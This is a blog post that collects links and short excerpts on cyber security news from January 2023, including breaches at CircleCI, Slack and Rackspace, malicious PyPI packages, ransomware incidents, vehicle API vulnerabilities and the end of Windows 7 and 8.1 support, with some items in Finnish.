This posting is here to collect cyber security news in January 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in January 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
446 Comments
Tomi Engdahl says:
CircleCI security alert: Rotate any secrets stored in CircleCI https://circleci.com/blog/january-4-2023-security-alert/
We wanted to make you aware that we are currently investigating a security incident, and that our investigation is ongoing. We will provide you updates about this incident, and our response, as they become available. At this point, we are confident that there are no unauthorized actors active in our systems; however, out of an abundance of caution, we want to ensure that all customers take certain preventative measures to protect your data as well. [...] Immediately rotate any and all secrets stored in CircleCI. These may be stored in project environment variables or in contexts. We also recommend customers review internal logs for their systems for any unauthorized access starting from December 21, 2022 through today, January 4, 2023, or upon completion of your secrets rotation
Tomi Engdahl says:
Slack’s private GitHub code repositories stolen over holidays https://www.bleepingcomputer.com/news/security/slacks-private-github-code-repositories-stolen-over-holidays/
“On December 29, 2022, we were notified of suspicious activity on our GitHub account. Upon investigation, we discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository. Our investigation also revealed that the threat actor downloaded private code repositories on December 27. No downloaded repositories contained customer data, means to access customer data, or Slacks primary codebase.” Original at https://slack.com/intl/en-gb/blog/news/slack-security-update
Tomi Engdahl says:
Työntekijöiden henkilötunnuksia levisi ympäri Apotti-tietojärjestelmää teknisen vian vuoksi tiedot eivät näkyneet potilaille
https://yle.fi/a/74-20011737
Vika on nyt korjattu. Vielä ei ole tiedossa, kuinka monen työntekijän henkilötunnukset ovat olleet avoimesti katsottavissa järjestelmän sisällä
Tomi Engdahl says:
Harvinaisen hyvä syy tehdä ohjelmistopäivitys bugi sammuttaa lentokoneen moottorit, kun laskuteline koskettaa maata
https://www.tivi.fi/uutiset/tv/6b360baa-edc5-44ec-a432-209aff7687d1
FAA:n joulukuun lopussa julkaisema Airworthiness Directive -ohjeistus koskee konetyypin Pratt & Whitney 1500G -sarjan ohivirtausmoottoreita tai pikemminkin moottoreiden toimintaa säätelevää ohjelmistoa
Tomi Engdahl says:
Vuoden 1987 hittielokuvan ennustus toteutui hämärä yritys iskee valvontakameroihin ennennäkemättömällä tavalla https://www.is.fi/digitoday/art-2000009307770.html
[Israelilaisen Haaretz-sanomalehden] mukaan Toka-niminen yritys myy ja kehittää teknologiaa, jolla voidaan väärentää sekä turvakameroiden suoraa videokuvaa että vanhoja tallenteita. Turvakameroiden lisäksi Tokan ratkaisuilla on mahdollista tunkeutua myös tavallisempiin web-kameroihin tietyllä säteellä ja katsoa niiden kuvaa väärentämisen lisäksi. Alkuperäinen
https://www.haaretz.com/israel-news/security-aviation/2022-12-26/ty-article-magazine/.premium/this-dystopian-cyber-firm-could-have-saved-mossad-assassins-from-exposure/00000185-0bc6-d26d-a1b7-dbd739100000
Tomi Engdahl says:
Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More https://samcurry.net/web-hackers-vs-the-auto-industry/
[W]e found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematic systems, automotive APIs, and the infrastructure that supports it.
Also
https://therecord.media/ferrari-bmw-rolls-royce-porsche-and-more-fix-vulnerabilities-giving-car-takeover-capabilities/
Tomi Engdahl says:
Ongoing Flipper Zero phishing attacks target infosec community https://www.bleepingcomputer.com/news/security/ongoing-flipper-zero-phishing-attacks-target-infosec-community/
A new phishing campaign is exploiting the increasing interest of security community members towards Flipper Zero to steal their personal information and cryptocurrency
Tomi Engdahl says:
Software provider denied insurance payout after ransomware attack https://www.malwarebytes.com/blog/news/2023/01/software-provider-denied-insurance-payout-after-ransomware-attack
The Supreme Court of Ohio issued a ruling days before the New Year that a software and service provider shouldn’t be covered by insurance against a ransomware attack as it didn’t cause direct or physical harm to tangible components of software, as it doesnt have any. “When insurance policy covers ‘physical damage’, there must be direct physical loss or physical damage of the covered media containing the computer software in order for the software to be covered under the policy,” the opinion document noted
Tomi Engdahl says:
Can You Trust Your VSCode Extensions?
https://blog.aquasec.com/can-you-trust-your-vscode-extensions
Aqua Nautilus researchers have recently discovered that attackers can easily impersonate popular Visual Studio Code extensions and trick unknowing developers into downloading them. In original vulnerability research, weve uncovered a new attack method which could act as an entry point for an attack on many organizations. Weve also discovered that some extensions may have already been taking advantage to exploit this attack vector. In this blog, we will further explore our findings, including a POC we uploaded to the Marketplace, and break down how we conducted this research
Tomi Engdahl says:
Rackspace: Customer email data accessed in ransomware attack https://www.bleepingcomputer.com/news/security/rackspace-customer-email-data-accessed-in-ransomware-attack/
Rackspace revealed on Thursday that attackers behind last month’s incident accessed some of its customers’ Personal Storage Table (PST) files which can contain a wide range of information, including emails, calendar data, contacts, and tasks. As discovered during the now-finished investigation led by cybersecurity firm Crowdstrike, the attackers gained access to the personal storage folders of 27 Rackspace customers. Rackspace update at
https://status.apps.rackspace.com/index/viewincidents?group=2
Tomi Engdahl says:
Exploit drops for remote code execution bug in Control Web Panel https://portswigger.net/daily-swig/exploit-drops-for-remote-code-execution-bug-in-control-web-panel
A pre-authentication remote code execution (RCE) exploit has landed for popular web hosting platform Control Web Panel (CWP). The corresponding vulnerability in CWP 7 was patched and then released in version 0.9.8.1147 on October 25. All previous versions are affected.
CWP, formerly CentOS Web Panel, is a free-to-use, Linux control panel with roughly 200,000 servers in active use. The Proof of Concept (PoC) was posted to GitHub and YouTube yesterday (January 5) by Numan Türle, security engineer at Turkish infosec outfit Gais Security. Türle told The Daily Swig that he disclosed technical details and requested a CVE after receiving assurances that a sufficient number of servers had been updated to the patched version
Tomi Engdahl says:
Freedom for MegaCortex ransomware victims – the fix is out https://www.theregister.com/2023/01/06/megacortex_ransomware_decryptor/
An international law enforcement effort has released a decryptor for victims of MegaCortex ransomware, widely used by cybercriminals to infect large corporations across 71 countries to the tune of more than
$100 million in damages
Tomi Engdahl says:
Air France and KLM notify customers of account hacks https://www.bleepingcomputer.com/news/security/air-france-and-klm-notify-customers-of-account-hacks/
Air France and KLM have informed Flying Blue customers that some of their personal information was exposed after their accounts were breached. Flying Blue is a loyalty program allowing clients of multiple airlines, including Air France, KLM, Transavia, Aircalin, Kenya Airways, and TAROM, to exchange loyalty points for various rewards
Tomi Engdahl says:
Moldovas government hit by flood of phishing attacks https://therecord.media/moldova%ca%bcs-government-hit-by-flood-of-phishing-attacks/
Moldovas cybersecurity regulator did not disclose whether the phishing campaigns were successful and how many state institutions were affected. It is also not clear who is behind these attacks and if the perpetrators were nation-state hackers or unaffiliated ransomware gangs. The regulator did not respond to The Records request for comment
Tomi Engdahl says:
Malicious PyPi packages create CloudFlare Tunnels to bypass firewalls https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-create-cloudflare-tunnels-to-bypass-firewalls/
Six malicious packages on PyPI, the Python Package Index, were found installing information-stealing and RAT (remote access trojan) malware while using Cloudflare Tunnel to bypass firewall restrictions for remote access. The malicious packages attempt to steal sensitive user information stored in browsers, run shell commands, and use keyloggers to steal typed secrets
Tomi Engdahl says:
SpyNote Android malware infections surge after source code leak https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/
The Android malware family tracked as SpyNote (or SpyMax) has had a sudden increase in detections in the final quarter of 2022, which is attributed to a source code leak of one of its latest, known as ‘CypherRat.’ Threat actors quickly snatched the malware’s source code and launched their own campaigns. Almost immediately, custom variants appeared that targeted reputable banks like HSBC and Deutsche Bank
Tomi Engdahl says:
The Cybercriminal Who Rose from the Dead https://blogs.blackberry.com/en/2023/01/cybercriminal-faked-death-found
When the U.S. government revealed charges against 26-year-old Mark Sokolovsky, it stunned more than a few cybersecurity researchers.
After all, they thought he was dead. Sokolovsky is now in a European jail, awaiting extradition to the United States, accused of being a key player in a massive international cybercrime operation that spawned a notorious Malware-as-a-Service (MaaS) known as Raccoon InfoStealer. The information-stealer targeted Windows® users, seeking out and swiping their stored credentials, which could then be sold on the dark web
Tomi Engdahl says:
Hackers Exploit Fortinet Devices to Spread Ransomware within Corporate Environments, Warns eSentire https://www.esentire.com/blog/hackers-exploit-fortinet-devices-to-spread-ransomware-within-corporate-environments-warns-esentire
In November 2022, TRU intercepted and shut down two separate cyber intrusions stemming from vulnerable Fortinet devices managed by third-party providers. Its not clear whether the ransomware actors bought access through an Initial Access Broker or conducted the attacks themselves. The two targets included a college in Canada and a global investment firm. [...] A flood of initial access offerings for a particular hardware or software product on Dark Web marketplaces is indicative of a high value target. In the case of Fortinet, many of the sales were labeled New Forti. As mentioned previously, brokers offered buyers access to individual companies, which appeared to sell relatively quickly, as well as bulk sales that took longer for the brokers to move
Tomi Engdahl says:
User Documents Overwritten With Malicious Code in Recent Dridex Attacks on macOS
https://www.securityweek.com/user-documents-overwritten-malicious-code-recent-dridex-attacks-macos
The cybercriminals behind the Dridex banking trojan have adopted a new tactic in recent attacks targeting macOS devices, overwriting the victim’s document files to deliver their malicious code, Trend Micro reports.
Active since at least 2012 and considered one of the most prevalent financial threats, Dridex survived a takedown attempt in 2015 and remained operational after receiving various updates. In 2019, the DHS warned of continuous Dridex attacks targeting financial institutions.
Tomi Engdahl says:
Qualcomm UEFI Flaws Expose Microsoft, Lenovo, Samsung Devices to Attacks
https://www.securityweek.com/qualcomm-uefi-flaws-expose-microsoft-lenovo-samsung-devices-attacks
Many devices made by Microsoft, Lenovo, Samsung and likely others are affected by potentially serious UEFI firmware vulnerabilities in Qualcomm Snapdragon chips.
Qualcomm announced this week the availability of patches for a dozen vulnerabilities, including five connectivity- and boot-related issues discovered by researchers at firmware security company Binarly.
Alex Matrosov, founder and CEO of Binarly, told SecurityWeek that they discovered a total of nine vulnerabilities while analyzing the firmware for Lenovo Thinkpad X13s laptops powered by the Qualcomm Snapdragon system-on-a-chip (SoC).
Further analysis revealed that while some of the nine flaws are specific to Lenovo devices, five of them impact Qualcomm reference code, which means the vulnerabilities are also present in laptops and other devices using Snapdragon chips.
The Snapdragon CPU uses the Arm architecture and Matrosov said this is the first such disclosure of UEFI firmware vulnerabilities related to the Arm device ecosystem.
“Based on Qualcomm’s advisory, the number of affected chipsets is massive,” Matrosov said via email.
Two types of vulnerabilities were discovered — stack-based buffer overflows and out-of-bounds read issues — both related to the DXE driver. They can be exploited by local attackers with elevated privileges, according to Lenovo’s advisory.
Qualcomm said patches for the vulnerabilities found by Binarly were made available to customers in November 2022, and the company has encouraged affected end users to apply security updates when they become available from device makers.
Binarly plans on disclosing technical details in a blog post scheduled for January 9.
Tomi Engdahl says:
Rackspace Completes Investigation Into Ransomware Attack
https://www.securityweek.com/rackspace-completes-investigation-ransomware-attack
Cloud company Rackspace has completed its investigation into the recent ransomware attack and found that the hackers did access some customer resources.
The ransomware attack only hit Rackspace’s Hosted Exchange environment, which the company was forced to shut down as a result of the incident. In its last update, Rackspace said the cybercriminals accessed the Personal Storage Table (PST) of 27 customers out of a total of nearly 30,000 customers.
https://www.securityweek.com/rackspace-confirms-ransomware-attack-it-tries-determine-if-data-was-stolen
Tomi Engdahl says:
Rackspace Confirms Ransomware Attack as It Tries to Determine If Data Was Stolen
https://www.securityweek.com/rackspace-confirms-ransomware-attack-it-tries-determine-if-data-was-stolen
Tomi Engdahl says:
More Political Storms for TikTok After US Government Ban
https://www.securityweek.com/more-political-storms-tiktok-after-us-government-ban
TikTok faces an uncertain year ahead in the United States as anti-China Republicans take greater control in Congress demanding tighter scrutiny for the highly popular video sharing app. Owned by Chinese tech giant ByteDance, TikTok has become a political punching bag for US conservatives who allege that the app downloaded by millions of US young people can be circumvented for spying or propaganda by the Chinese Communist Party (CCP).
Tomi Engdahl says:
16 Car Makers and Their Vehicles Hacked via Telematics, APIs, Infrastructure
https://www.securityweek.com/16-car-makers-and-their-vehicles-hacked-telematics-apis-infrastructure
A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car functions and start or stop the engine.
Multiple other security defects, the researchers say, allowed them to access a car maker’s internal applications and systems, leading to the exposure of personally identifiable information (PII) belonging to customers and employees, and account takeover, among others. The hacks targeted telematic systems, automotive APIs, and infrastructure.
Impacted car models include Acura, BMW, Ferrari, Ford, Genesis, Honda, Hyundai, Infiniti, Jaguar, Kia, Land Rover, Mercedes-Benz, Nissan, Porsche, Rolls Royce, and Toyota. The vulnerabilities were identified over the course of 2022. Car manufacturers were informed about the security holes and they released patches.
Vehicle impact
According to the researchers, they were able to send commands to Acura, Genesis, Honda, Hyundai, Kia, Infiniti, Nissan, and Porsche vehicles.
Using only the VIN (vehicle identification number), which is typically visible on the windshield, the researchers were able to start/stop the engine, remotely lock/unlock the vehicle, flash headlights, honk vehicles, and retrieve the precise location of Acura, Honda, Kia, Infiniti, and Nissan cars.
They could also lock users out of remote vehicle management and could change car ownership.
Tomi Engdahl says:
Burger Chain Five Guys Discloses Data Breach Impacting Job Applicants
https://www.securityweek.com/burger-chain-five-guys-discloses-data-breach-impacting-job-applicants
US burger chain Five Guys has disclosed a data breach impacting job applicants, and the company may be facing a lawsuit over the cybersecurity incident.
Five Guys appears to have started informing customers on December 29, when it also notified state authorities about the incident.
It’s not uncommon for companies to disclose cybersecurity incidents just before or during major holidays in an effort to avoid too much media coverage. However, Five Guys’ data breach notification was noticed by Turke & Strauss, a law firm specializing in data breaches.
The law firm, which is urging impacted individuals to get in touch to discuss potential legal action against the fast food chain, revealed that exposed information includes names, Social Security numbers, and driver’s license numbers.
Tomi Engdahl says:
https://hackaday.com/2023/01/06/this-week-in-security-lastpass-takeaway-bitcoin-loss-and-pytorch/
Bitcoin Hacker Hacked
Luke Dashjr is a Bitcoin Core developer, the primary signer of the Bitcoin Knots software, and has suffered a major security breach. This may be a follow-on incident from a November physical attack, where someone managed to reboot his co-located server from a flash drive, and install a backdoor. That one was caught, and the malware was seemingly removed. Luke lost a total of about 200 bitcoin, out of both his active (hot) and offline (cold) wallets. He’s treating this as a total compromise, and has warned that his PGP key should be suspect as well. That means recent releases of Bitcoin Knots should be suspect, too.
https://twitter.com/LukeDashjr/status/1609613748364509184
Tomi Engdahl says:
Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More
https://samcurry.net/web-hackers-vs-the-auto-industry/
Tomi Engdahl says:
Elizabeth Dwoskin / Washington Post:
How Telegram, TikTok, Instagram, Facebook, and Twitter were used to boost election fraud claims in Brazil before riots hit congress and supreme court buildings
https://www.washingtonpost.com/technology/2023/01/08/brazil-bolsanaro-twitter-facebook/
Tomi Engdahl says:
20 vuotta vanhasta Nokia-puhelimesta maksetaan satoja euroja – syy on karu https://www.is.fi/digitoday/tietoturva/art-2000009314642.html
LÄHINNÄ museoon kuuluvasta Nokian puhelinmallista maksetaan kovia summia vielä tänäkin päivänä, tietoturva-asiantuntija Mikko Hyppönen kertoi Twitterissä. Kyseessä on Nokia 1100 ja nimenomaan sen Saksan Bochumin-tehtaalla vuosina 2003–2004 valmistettu RH-18-versio.
Syynä on puhelimissa oleva laiteohjelmiston haavoittuvuus. Hyppösen mukaan sen avulla on oletettavasti mahdollista ohjelmoida puhelin ottamaan vastaan toiseen puhelinnumeroon lähetettyjä tekstiviestejä. Näin olisi mahdollista kaapata esimerkiksi verkkopankkitietoja.
PUHELINTEN heikkous on ollut tiedossa pitkään. Vuonna 2009 tietoturvayhtiö Ultrascan pystyi muuntamaan Bochumissa tuotettua 1100:aa niin, että sillä saatiin haltuun pankin tekstiviestinä lähettämä kertakäyttöinen salasana. Digitoday kirjoitti asiasta tuolloin.
Tuolloin Nokia kiisti matkapuhelinohjelmiston virheen ja huomautti, että huijaukseen tarvitaan myös uhrin sim-kortin klooni.
Tomi Engdahl says:
Exclusive: Russian hackers targeted U.S. nuclear scientists https://www.reuters.com/world/europe/russian-hackers-targeted-us-nuclear-scientists-2023-01-06/
A Russian hacking team known as Cold River targeted three nuclear research laboratories in the United States this past summer, according to internet records reviewed by Reuters and five cyber security experts. [..] Cold River targeted the Brookhaven (BNL), Argonne (ANL) and Lawrence Livermore National Laboratories (LLNL), according to internet records that showed the hackers creating fake login pages for each institution and emailing nuclear scientists in a bid to make them reveal their passwords
Tomi Engdahl says:
This is the end, Windows 7 and 8 friends. Microsoft support ends this week https://www.theregister.com/2023/01/09/microsoft_windows_7_8_support_ends/
As Microsoft has been warning, the company is yanking support for Windows 7 Extended Security Update (ESU) and Windows 8 and 8.1 on Tuesday, January 10, which means users of those OSes will need to shift to Windows 10 or 11 to continue getting technical assistance and software updates
Tomi Engdahl says:
Identity Thieves Bypassed Experian Security to View Credit Reports https://krebsonsecurity.com/2023/01/identity-thieves-bypassed-experian-security-to-view-credit-reports/
Identity thieves have been exploiting a glaring security weakness in the website of Experian, one of the big three consumer credit reporting bureaus. Normally, Experian requires that those seeking a copy of their credit report successfully answer several multiple choice questions about their financial history. But until the end of 2022, Experians website allowed anyone to bypass these questions and go straight to the consumers report. All that was needed was the persons name, address, birthday and Social Security number
Tomi Engdahl says:
Initial access techniques in Kubernetes environments used by Kinsing malware
https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/initial-access-techniques-in-kubernetes-environments-used-by/ba-p/3697975
In this blog post, we will focus on a specific angle of Kinsing: the initial access techniques in Kubernetes environments. While Kinsing uses multiple initial access vector techniques, in Microsoft Defender for Cloud, we recently observed two methods that are especially
common: Exploitation of weakly configured PostgreSQL containers and exploiting vulnerable images. We will discuss these methods and explain how organizations can detect and mitigate those threats
Tomi Engdahl says:
Serbian government reports massive DDoS attack amid heightened tensions in Balkans https://therecord.media/serbian-government-reports-massive-ddos-attack-amid-heightened-tensions-in-balkans/
So far five large attacks aimed at disabling the IT infrastructure of the Ministry of Interior have been repelled, said Belgrade, adding that government employees and staff from state-owned Telekom Srbija (Telecom Serbia) were able to counter the attacks
Tomi Engdahl says:
New Study Uncovers Text-to-SQL Model Vulnerabilities Allowing Data Theft and DoS Attacks https://thehackernews.com/2023/01/new-study-uncovers-text-to-sql-model.html
“To better interact with users, a wide range of database applications employ AI techniques that can translate human questions into SQL queries (namely Text-to-SQL),” Xutan Peng, a researcher at the University of Sheffield, told The Hacker News. The findings, which were validated against two commercial solutions BAIDU-UNIT and AI2sql, mark the first empirical instance where natural language processing
(NLP) models have been exploited as an attack vector in the wild.
Paper at https://arxiv.org/abs/2211.15363
Tomi Engdahl says:
Unwrapping Ursnifs Gifts
https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/
In late August 2022, we investigated an incident involving Ursnif malware, which resulted in Cobalt Strike being deployed. This was followed by the threat actors moving laterally throughout the environment using an admin account
Tomi Engdahl says:
Three Lessons from Threema Analysis of a Secure Messenger https://breakingthe3ma.app/ In our work, we present seven attacks against the cryptographic protocols used by Threema, in three distinct threat models. All the attacks are accompanied by proof-of-concept implementations that demonstrate their feasibility in practice. Rebuttal at https://threema.ch/en/blog/posts/news-alleged-weaknesses-statement
“[T]he paper is based on an old protocol that is no longer in use. The presented findings do not apply to Threemas current communication protocol Ibex or have already been addressed.”
Tomi Engdahl says:
I scanned every package on PyPi and found 57 live AWS keys https://tomforb.es/i-scanned-every-package-on-pypi-and-found-57-live-aws-keys/
After inadvertently finding that InfoSys leaked an AWS key on PyPi I wanted to know how many other live AWS keys may be present on Python package index. After scanning every release published to PyPi I found
57 valid access keys
Tomi Engdahl says:
Vice Society Releases Info Stolen From 14 UK Schools, Including Passport Scans https://www.darkreading.com/attacks-breaches/vice-society-releases-info-stolen-uk-schools-passport-scans
Another month, another release of personal information stolen from a school system. This time, it’s a group of 14 schools in the United Kingdom. In what’s become a pattern, the cybercriminal ring stole data, demanded payment, and posted personal information when ransom was denied
Tomi Engdahl says:
CISA Notifies Hitachi Energy Customers of High-Severity Vulnerabilities
https://www.securityweek.com/cisa-notifies-hitachi-energy-customers-high-severity-vulnerabilities
The US Cybersecurity and Infrastructure Security Agency (CISA) published advisories last week to inform organizations using Hitachi Energy products about several recently addressed critical and high-severity vulnerabilities.
CISA has published three advisories describing security flaws in three products made by energy solutions provider Hitachi Energy. The vendor published its own advisories for the vulnerabilities in December. The advisories, hosted on ABB’s website, were released just weeks before ABB announced that it had completed the sale of its remaining stake in Hitachi Energy to Hitachi.
One CISA advisory describes five high-severity vulnerabilities in UNEM, a component of Hitachi Energy’s network management system (NMS). The issues are related to encryption and user credentials, and they can be exploited to obtain sensitive information and make malicious modifications to the system. Network access to the targeted system is required for exploitation.
Tomi Engdahl says:
Air France, KLM Customers Warned of Loyalty Program Account Hacking
https://www.securityweek.com/air-france-klm-customers-warned-loyalty-program-account-hacking
Franco-Dutch airline company Air France-KLM has started informing Flying Blue customers of a data breach involving their user accounts.
Air France-KLM was formed in 2004, following the merger between Air France and KLM. Flying Blue is their loyalty program, also used by Aircalin, Kenya Airways, TAROM, and Transavia.
Last week, the airline group started notifying Flying Blue customers of suspicious activity on their accounts, saying that some of their personal information might have been compromised during the incident.
“Our security operations teams have detected suspicious behavior by an unauthorized entity in relation to your account. We have immediately implemented corrective action to prevent further exposure of your data,” the notification reads.
Potentially compromised data includes names, phone numbers, email addresses, Flying Blue numbers and level, miles balance, and last transaction.
According to Air France-KLM, no credit card data or payment information was exposed during the incident.
https://twitter.com/BurgerhoutJ/status/1611427713629175808
Tomi Engdahl says:
Justices Turn Away Israeli Spyware Maker in WhatsApp Suit
https://www.securityweek.com/justices-turn-away-israeli-spyware-maker-whatsapp-suit
The Supreme Court on Monday rejected an Israeli spyware maker’s bid to derail a high-profile lawsuit filed by the WhatsApp messaging service.
The justices left in place lower court rulings against the Israeli firm, NSO Group. WhatsApp claims that NSO targeted some 1,400 users of the encrypted messaging service with highly sophisticated spyware.
Tomi Engdahl says:
Microsoft Flags Ransomware Problems on Apple’s macOS Platform
https://www.securityweek.com/microsoft-flags-ransomware-problems-apples-macos-platform
Security researchers at Microsoft are flagging ransomware attacks on Apple’s flagship macOS operating system, warning that financially motivated cybercriminals are abusing legitimate macOS functionalities to exploit vulnerabilities, evade defenses, or coerce users to infect their devices.
In a blog post documenting its research into four known macOS ransomware families, Microsoft’s Security Threat Intelligence team published IOCs and technical details to show how ransomware actors target users on macOS-powered devices.
Tomi Engdahl says:
Verkkopankkisi voi olla taitavasti väärennetty – yksi virhe aloittaa rikollisten häijyn prosessin
Huijauksiin liittyvät yhteydenotot ovat lähes kaksinkertaistuneet, Vakuutus- ja rahoitusneuvonta kertoo.
https://www.iltalehti.fi/digiuutiset/a/5f976126-b112-48e1-acd8-5cb5f74a1495
Asiakkaita huijataan verkkopankilta näyttävillä valesivustoillä, kertoo Vakuutus- ja rahoitusneuvonta Fine tiedotteessaan.
Huijaustapauksiin liittyvät yhteydenotot ovat lähes kaksinkertaistuneet edellisvuoteen verrattuna. Yhteydenottoja huijauksista on tullut yhteensä 450, Fine kertoo.
Tomi Engdahl says:
Suomesta tullut houkuttelevampi kohde kyberhyökkäyksille
https://etn.fi/index.php/13-news/14440-suomesta-tullut-houkuttelevampi-kohde-kyberhyoekkaeyksille
Tietoturvayritys Check Pointin tutkimusosasto kertoo, että Suomessa kyberhyökkäysten määrä kasvoi 81 prosenttia vuonna 2022 edellisvuoteen verrattuna. Keskimäärin vuonna 2022 Suomessa oli 1228 kyberhyökkäystä viikoittain organisaatiota kohti.
Tomi Engdahl says:
Vulnerability in Popular JsonWebToken Open Source Project Leads to Code Execution
https://www.securityweek.com/vulnerability-popular-jsonwebtoken-open-source-project-leads-code-execution
A vulnerability in the JsonWebToken open source JavaScript package could be exploited to achieve remote code execution (RCE), Palo Alto Networks’ Unit 42 warns.
Maintained by the Auth0 team and designed to help with the verification and signing of web token (JWT) requests, JsonWebToken is used in many applications for authentication and authorization, and has more than 9 million weekly downloads.
Tracked as CVE-2022-23529 (CVSS score of 7.6), the vulnerability was found in the package’s verify function and can be exploited using a maliciously crafted JSON JWT request.
During the authentication process, the user-supplied credentials are sent to the authentication endpoint, which validates the information and issues a JWT signed with a secret key.
Moving forth, when a user requests access to resources, the application sends a request containing a JWT in the authorization header, which is verified using the secret key.
Tomi Engdahl says:
GitHub Introduces Automatic Vulnerability Scanning Feature
https://www.securityweek.com/github-introduces-automatic-vulnerability-scanning-feature
Microsoft-owned code hosting platform GitHub is now providing developers with the option to have their code repositories automatically scanned for vulnerabilities.
Available as a ‘default setup’ option, the new feature is meant to help code builders find and resolve vulnerabilities faster.
Available for JavaScript, Python, and Ruby repositories, it allows open source developers and enterprises to enable code scanning without the use of a .yaml file and will immediately provide them with insights into their code’s issues.
To enable the new option, GitHub users should head to the ‘Settings’ tab in their repositories and then navigate to ‘Code security and analysis’, under ‘Security’.
Tomi Engdahl says:
PyPI Users Targeted With PoweRAT Malware
https://www.securityweek.com/pypi-users-targeted-powerat-malware
Software supply chain security firm Phylum has identified a malicious attack targeting Python Package Index (PyPI) users with the PoweRAT backdoor and information stealer.
The campaign was first detected on December 22, 2022, when a malicious package named PyroLogin was identified as Python malware designed to fetch code from a remote server and execute it silently.
Between December 28 and 31, Phylum’s security researchers observed five additional packages containing code similar to PyroLogin being published to PyPI: EasyTimeStamp, Discorder, Discord-dev, Style.py, and PythonStyles.
The infection chain, which involves the execution of various scripts and the abuse of legitimate operating system functions, begins with a setup.py file, meaning that the malware is automatically deployed if the malicious packages are installed using Pip.
Tomi Engdahl says:
Iowa’s Largest City Cancels Classes Due to Cyber Attack
https://www.securityweek.com/iowas-largest-city-cancels-classes-due-cyber-attack
Iowa’s largest school district cancelled classes for Tuesday after determining there was a cyber attack on its technology network.
Des Moines Public Schools announced Monday that classes would be cancelled for its 33,000 students after being “alerted to a cyber security incident on its technology network.”
The district said in a news release that it took its internet and network services offline while it assessed the situation. It didn’t describe the nature of the attack or say whether sensitive information might have been stolen, and it didn’t immediately respond to a request for further information.
“Because many technology tools that support both classroom learning as well as the management and operation of the school district are not available at this time, the prudent decision is to close the district for the day,” the district said.
Tomi Engdahl says:
Windows 7 Extended Security Updates, Windows 8.1 Reach End of Support
https://www.securityweek.com/windows-7-extended-security-updates-windows-81-reach-end-support
Today, on January 10, 2023, Windows 7 Extended Security Updates (ESU) and Windows 8.1 have reached their end of support dates.
Windows 7 reached end of life (EoL) on January 14, 2020, but Microsoft gave customers the option to continue receiving important security updates through its ESU program. However, ESUs will no longer be available for purchase after January 10, 2023.
Windows 8.1 support ends on the same day. Computers running this version of Windows will continue to function, but will no longer receive technical support, software updates and, importantly, security updates or patches. In addition, Microsoft will not be offering an ESU program for Windows 8.1.Windows 8.1 reaches end of life
“Continuing to use Windows 8.1 after January 10, 2023 may increase an organization’s exposure to security risks or impact its ability to meet compliance obligations,” the tech giant warns.
Microsoft also announced that Edge 109, scheduled for release on January 12, is the last version to support Windows 7, Windows 8.1, and Windows Server 2008 R2, Server 2012 and Server 2012 R2.
Windows Server 2012 and Server 2012 R2 will reach end of support on October 10, 2023. After this date, these operating systems will no longer receive security and non-security updates, bug fixes, technical support, or online technical content updates.